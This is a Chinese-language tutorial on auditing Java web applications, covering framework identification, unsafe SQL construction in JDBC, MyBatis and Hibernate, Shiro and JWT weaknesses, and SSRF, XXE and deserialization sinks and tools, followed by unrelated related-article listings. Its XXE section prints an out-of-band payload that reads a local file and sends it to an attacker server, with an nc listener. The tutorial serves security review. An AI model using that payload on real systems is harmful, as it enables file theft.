代码审计-JAVA----javaweb代码审计思路

本文涉及的产品
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介: 代码审计-JAVA----javaweb代码审计思路

一、框架-组件-依赖库-过滤器

1、框架-组件-依赖库

通过了解了开发的框架以及组件以后,可以扩大攻击面

查看配置文件web.xml和外部引用库,确定当前引用框架名称和版本

通过获取的版本等,对比漏洞库

框架确定:
1、maven(查看pom.xml关键字)
spring-core/ springframework.core    spring框架
struts2-core                         struts2框架
springframework.boot                 srping-boot框架
servlet-api                          原生servlet
 
2、lib(查看jar包名称)
spring-core/springframework.core    spring框架
struts2-core                        struts2框架
spring-boot                         srping-boot框架
servlet-api                         原生servlet
配置文件:
Struts2     struts.xml
Spring      applicationContext.xml
Spring MVC  spring-mvc.xml
Hibernate   Hibernate.cfg.xml
Mybaits     mybatis-config.xml

2、过滤器

过滤器专门设置了针对SQL注入、XSS等拦截

通过对过滤器分析,可以知道过滤规则,以及可以最终筛选出未使用过滤器的URL

(也可以搜索关键字定位过滤器)

web.xml中
<filter>
    <filter-name>xsscheck</filter-name>//名字
    <filter-class>com.anbai.sec.XssFilter</filter-class>//class
</filter>
<filter-mapping>
    <filter-name>xsscheck</filter-name>//名字
    <url-pattern>*.jsp</url-pattern>//路由
</filter-mapping>

二、SQL注入

(数据库模式--->sql语句的写法--->函数--->类--->调用层次)

1、JDBC 注入

全称:Java数据库连接(Java Database connect),它是一套用于执行SQL语句的Java API。应用程序可通过这套API连接到关系数据库,并使用SQL语句来完成对数据库中数据的查询、更新和删除等操作

1、PreparedStatement预编译机制(安全写法)
 
// sql语句(使用?进行占位)
String sql = "select * from user where id = ?";         
// sql语句的预编译(返回一个预编译对象)
xxx = conn.prepareStatement(sql);
 
 
2、直接进行拼接(不安全写法)
String sql = "select * from user where id ="+req.getParameter("id");

2、Mybatis注入

使用简单的 XML 或注解来配置和映射原生信息,将接口和 Java 的 POJO(Plain Old Java Objects,普通的Java对象)映射成数据库中的记录

搜索xml查找关键点(如${)--->反推到DAO--->到实现类--->通过调用链找到前台URL--->找到利用点

1、#会对语句进行预编译
安全写法(): select *  from user where name = #{name}
 
2、${ }动态解析SQL时候会进行变量替换( 只进行string替换)
不安全写法(UserDao.xml):select *  from user where name = ${name} 
 
3、产生原因
 
模糊查询
使用#程序会报错         Select * from news where title like ‘%#{title}%’
(可能会把#号改成了$)
正确:                  Select * from news where tile like concat(‘%’,#{title}, ‘%’)
 
 
in 后有参数
使用# 同样会报错        Select * from news where id in (#{ids})
(可能会将将#替换为$)
正确(使用foreach)       id in<foreach collection="ids" item="item" open="("separatosr="," close=")">#{ids} </foreach>
 
 
order by
order by使用的是$,而like和in没有问题

3、Hibernate注入

Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,它将POJO与数据库表建立映射关系,是一个全自动的orm框架,hibernate可以自动生成SQL语句,自动执行,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库。 Hibernate可以应用在任何使用JDBC的场合,既可以在Java的客户端程序使用,也可以在Servlet/JSP的Web应用中使用,最具革命意义的是,Hibernate可以在应用EJB的JavaEE架构中取代CMP,完成数据持久化的重任

1、安全写法():参数绑定预编译
Query<User>.query=session.createNativeQuery("select * from user  where name=:name");
query.setParameter("name",parameter) ;
 
2、不安全写法(User.java):直接拼接
Query<User>.query=session.createNativeQuery("select * from user  where name="+req.getParameter("id"));

三、安全验证

1、验证框架

1、
Shiro:通用性,是一个权限管理的框架,实现用户认证、用户授权等
Spring Security:和 Spring 无缝整合
……
 
2、分析pom.xml Maven配置文件
<shiro-spring-version>……</shiro-spring-version>
<shiro-ehcache.version>……</shiro-ehcache.version>
针对对应的版本号,搜索已爆出的框架漏洞
 
3、查看shiro配置信息
tumo.shiro.anon_url=\
  /login,/logout,/register,\
  /,/about,/p/**,/links,/comment/**,/link/list,/article/list,\
  /css/**,/js/**,/img/**
(anon代表不需要鉴权的配置,**表示该接口下的所有接口)

2、代码验证

这就得抓包,并结合反编译对验证代码进行审计了


3、过滤器

过滤器的绕过、过滤器未引用


无非就是绕过if等判断语句


4、JWT加密

对于身份等重要的信息可能会使用JWT加密(在不知道密钥的情况下,黑盒很难利用)


JWT是三段式,在cookie中一眼就能看出加密后生成的token


(header.payload.signature)

1、空加密算法   
在header中指定alg为None
变为:header.payload
 
 
2、加密算法
RSA:非对称加密算法,使用私钥加密明文,公钥解密密文
HMAC:对称加密算法,使用相同的密钥对传输信息进行加解密
公钥可以通过一些途径获取(如前端加密等)
尝试使用HMAC替换RSA
 
 
3、kid(header中可选参数,指定加密密钥)
用户可控,可测试注入、文件读取等

四、常规漏洞

1、代码、函数执行

1、可执行函数(如exec()等),搞清楚传递过程,是否用户可控


2、表达式注入(一般是参数值,不过有的也有极少的是参数名,一般会有检测,如OGNL、SpEL、MVEL、EL、Fel、JST+EL等)


3、后端模板引擎注入(如Freemarker、Velocity、Thymeleaf等)


4、第三方开源组件(如Fastjson、Shiro、Xstream、Struts2)


2、SSTI

【SSTI模块注入】SSTI+Flask+Python(上)


【SSTI模块注入】SSTI+Flask+Python(中)


【SSTI模块注入】SSTI+Flask+Python(下)


源码:在pom.xml里面找使用有模版引擎,如freemarker


前端:寻找修改模块的功能点


3、SSRF

【SSRF漏洞】原理、危害利用、触发点、利用过程、协议使用……

危险函数
urlConnection.getInputStream
HttpURLConnection.getInputStream
URLConnection.getInutStream      
HttpClient.execute
OkHttpClient.newCall.execute
Request.Get.execute
Request.Post.execute
URL.openStream                 
ImageIO.rea

4、XXE

【XXE漏洞专题】XXE原理、产生、检测、危害、利用、示例

xlsx-streamer poi-ooxml
Documentbuilder|DocumentBuilderFactory|SAXReader|SAXParser|SAXParserFactory|SAXBuilder|TransformerFactory|reqXml|getInputStream|XMLReaderFactory|.newInstance|SchemaFactory|SAXTransformerFactory|javax.xml.bind|XMLReader|XmlUtils.get|Validator
javax.xml.parsers.DocumentBuilder
javax.xml.stream.XMLStreamReader
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
javax.xml.parsers.SAXParser
org.dom4j.io.SAXReader
org.xml.sax.XMLReader
javax.xml.transform.sax.SAXSource
javax.xml.transform.TransformerFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.validation.SchemaFactory
javax.xml.bind.Unmarshaller
javax.xml.xpath.XPathExpression
org.apache.commons.digester3.Digester
xxx.xlsx:
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://攻击者服务器/xxx.dtd">
%remote;%int;%send;
]>
<root>&send;</root>
 
xxx.dtd:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://攻击者服务器:端口/%file;'>">
 
攻击者服务器监听
nc -lvvp 端口

5、反序列化

序列化使用的地方:


1、参数,cookie,sesion,存储时候可能会base64,压缩后的base64、MII等加密


2、Servlets http,Sockets,Session管理器(包含的协议:JMX,RMI,JMS,JND1等)


3、xmlXstream,XmldEcoder等(http Body:Content-type: application/xml)


4、json(jackson,fastjson)http请求中包含


框架组件:fastjson,shiro,jackson,CommonsCollections等


利用工具:


jndi:可用于Fastjson、Jackson等验证

ysoserial:支持多种引用库生成的payload

marshalsec:可以快速启动rmi/ldap server

FastjsonExploit:专门针对fastjson的exp框架


ObjectInputStream.readObject
ObjectInputStream.readUnshared
XMLDecoder.readObject
Yaml.load
XStream.fromXML
ObjectMapper.readValue
JSON.parseObject

【PHP反序列化】PHP反序列化原理、函数、利用过程

【JAVA反序列化漏洞】简介、原理、工具、环境、靶场、思路


五、审计工具

Fortify、CheckMarx、Findbugs、PMD等

相关文章
|
5天前
|
存储 网络协议 安全
Java网络编程,多线程,IO流综合小项目一一ChatBoxes
**项目介绍**:本项目实现了一个基于TCP协议的C/S架构控制台聊天室,支持局域网内多客户端同时聊天。用户需注册并登录,用户名唯一,密码格式为字母开头加纯数字。登录后可实时聊天,服务端负责验证用户信息并转发消息。 **项目亮点**: - **C/S架构**:客户端与服务端通过TCP连接通信。 - **多线程**:采用多线程处理多个客户端的并发请求,确保实时交互。 - **IO流**:使用BufferedReader和BufferedWriter进行数据传输,确保高效稳定的通信。 - **线程安全**:通过同步代码块和锁机制保证共享数据的安全性。
55 23
|
12天前
|
Java 调度
【源码】【Java并发】【线程池】邀请您从0-1阅读ThreadPoolExecutor源码
当我们创建一个`ThreadPoolExecutor`的时候,你是否会好奇🤔,它到底发生了什么?比如:我传的拒绝策略、线程工厂是啥时候被使用的? 核心线程数是个啥?最大线程数和它又有什么关系?线程池,它是怎么调度,我们传入的线程?...不要着急,小手手点上关注、点赞、收藏。主播马上从源码的角度带你们探索神秘线程池的世界...
81 0
【源码】【Java并发】【线程池】邀请您从0-1阅读ThreadPoolExecutor源码
|
16天前
|
存储 监控 Java
【Java并发】【线程池】带你从0-1入门线程池
欢迎来到我的技术博客!我是一名热爱编程的开发者,梦想是编写高端CRUD应用。2025年我正在沉淀中,博客更新速度加快,期待与你一起成长。 线程池是一种复用线程资源的机制,通过预先创建一定数量的线程并管理其生命周期,避免频繁创建/销毁线程带来的性能开销。它解决了线程创建成本高、资源耗尽风险、响应速度慢和任务执行缺乏管理等问题。
142 60
【Java并发】【线程池】带你从0-1入门线程池
|
1月前
|
Java 程序员 开发者
Java社招面试题:一个线程运行时发生异常会怎样?
大家好,我是小米。今天分享一个经典的 Java 面试题:线程运行时发生异常,程序会怎样处理?此问题考察 Java 线程和异常处理机制的理解。线程发生异常,默认会导致线程终止,但可以通过 try-catch 捕获并处理,避免影响其他线程。未捕获的异常可通过 Thread.UncaughtExceptionHandler 处理。线程池中的异常会被自动处理,不影响任务执行。希望这篇文章能帮助你深入理解 Java 线程异常处理机制,为面试做好准备。如果你觉得有帮助,欢迎收藏、转发!
106 14
|
1月前
|
安全 Java 程序员
Java 面试必问!线程构造方法和静态块的执行线程到底是谁?
大家好,我是小米。今天聊聊Java多线程面试题:线程类的构造方法和静态块是由哪个线程调用的?构造方法由创建线程实例的主线程调用,静态块在类加载时由主线程调用。理解这些细节有助于掌握Java多线程机制。下期再见! 简介: 本文通过一个常见的Java多线程面试题,详细讲解了线程类的构造方法和静态块是由哪个线程调用的。构造方法由创建线程实例的主线程调用,静态块在类加载时由主线程调用。理解这些细节对掌握Java多线程编程至关重要。
57 13
|
1月前
|
安全 Java 开发者
【JAVA】封装多线程原理
Java 中的多线程封装旨在简化使用、提高安全性和增强可维护性。通过抽象和隐藏底层细节,提供简洁接口。常见封装方式包括基于 Runnable 和 Callable 接口的任务封装,以及线程池的封装。Runnable 适用于无返回值任务,Callable 支持有返回值任务。线程池(如 ExecutorService)则用于管理和复用线程,减少性能开销。示例代码展示了如何实现这些封装,使多线程编程更加高效和安全。
|
2月前
|
缓存 安全 算法
Java 多线程 面试题
Java 多线程 相关基础面试题
|
2月前
|
监控 Java
java异步判断线程池所有任务是否执行完
通过上述步骤,您可以在Java中实现异步判断线程池所有任务是否执行完毕。这种方法使用了 `CompletionService`来监控任务的完成情况,并通过一个独立线程异步检查所有任务的执行状态。这种设计不仅简洁高效,还能确保在大量任务处理时程序的稳定性和可维护性。希望本文能为您的开发工作提供实用的指导和帮助。
126 17
|
3月前
|
Java
Java—多线程实现生产消费者
本文介绍了多线程实现生产消费者模式的三个版本。Version1包含四个类:`Producer`(生产者)、`Consumer`(消费者)、`Resource`(公共资源)和`TestMain`(测试类)。通过`synchronized`和`wait/notify`机制控制线程同步,但存在多个生产者或消费者时可能出现多次生产和消费的问题。 Version2将`if`改为`while`,解决了多次生产和消费的问题,但仍可能因`notify()`随机唤醒线程而导致死锁。因此,引入了`notifyAll()`来唤醒所有等待线程,但这会带来性能问题。
Java—多线程实现生产消费者
|
3月前
|
消息中间件 缓存 安全
Java多线程是什么
Java多线程简介:本文介绍了Java中常见的线程池类型,包括`newCachedThreadPool`(适用于短期异步任务)、`newFixedThreadPool`(适用于固定数量的长期任务)、`newScheduledThreadPool`(支持定时和周期性任务)以及`newSingleThreadExecutor`(保证任务顺序执行)。同时,文章还讲解了Java中的锁机制,如`synchronized`关键字、CAS操作及其实现方式,并详细描述了可重入锁`ReentrantLock`和读写锁`ReadWriteLock`的工作原理与应用场景。

热门文章

最新文章